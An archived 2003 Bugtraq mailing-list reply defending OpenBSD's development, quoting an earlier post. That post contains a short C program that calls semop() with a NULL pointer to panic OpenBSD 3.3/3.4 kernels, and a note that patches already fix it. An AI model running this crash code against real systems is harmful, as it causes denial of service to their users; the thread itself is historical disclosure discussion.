Re: yet another panic() in OpenBSD

From: Coleman Kane (cokane_at_cokane.org)
Date: 11/24/03

  • Next message: Casper Dik: "Re: hard links on Linux create local DoS vulnerability and security problems"
    Date: Mon, 24 Nov 2003 18:29:02 +0000
    To: bugtraq@securityfocus.com
    
    
    

    I think alot of people are missing the point of OpenBSD. They only focus
    on removing security related (privilege escalation, and so forth) flaws
    from their software. That's what ProPolice and W^X and all the other stuff
    is about. It is a project lacking a lot of good developers who are instead
    focused on Linux or Free/NetBSD. Many of it's contributions make it back up
    into the trees of the more mainstream projects, OpenSSH/SSL, crypto devices,
    pf, and more.

    I really don't get the consistent OpenBSD bashing that goes on here. They do
    a lot of good work, and if you keep noticing a lack of 'basic QA and unit
    testing' and other flaws you should try to contribute. The reason they lack
    many of these ameneties that other projects have is that they are a much
    smaller organization.

    On Sat, Nov 22, 2003 at 11:39:23PM +0100, Henning Brauer wrote, and it was proclaimed:
    > On Fri, Nov 21, 2003 at 05:46:01PM -0500, noir@uberhax0r.net wrote:
    > > a project lacking the basic QA and unit testing and here is the outcome:
    > >
    > > #include <stdio.h>
    > > #include <sys/types.h>
    > > #include <sys/sem.h>
    > > #include <sys/ipc.h>
    > >
    > > int
    > > main()
    > > {
    > > int i;
    > >
    > > for(i = 0; i < 0x40; i++)
    > > semop(i, (struct sembuf *) NULL, 0);
    > >
    > > }
    > >
    > >
    > > PANIC in OpenBSD 3.3 and 3.4 is confirmed.
    >
    > please note that patch 008 for OpenBSD 3.4 / 013 for OpenBSD 3.3 fixes
    > that issue.
    > This patch was out _before_ the above post.
    >
    > It's not really hard to look at the patch and post to fd and bugtraq
    > afterwards...
    >
    > --
    > Henning Brauer, BS Web Services, http://bsws.de
    > hb@bsws.de - henning@openbsd.org
    > Unix is very simple, but it takes a genius to understand the simplicity.
    > (Dennis Ritchie)

    
    



  • Next message: Casper Dik: "Re: hard links on Linux create local DoS vulnerability and security problems"

    Relevant Pages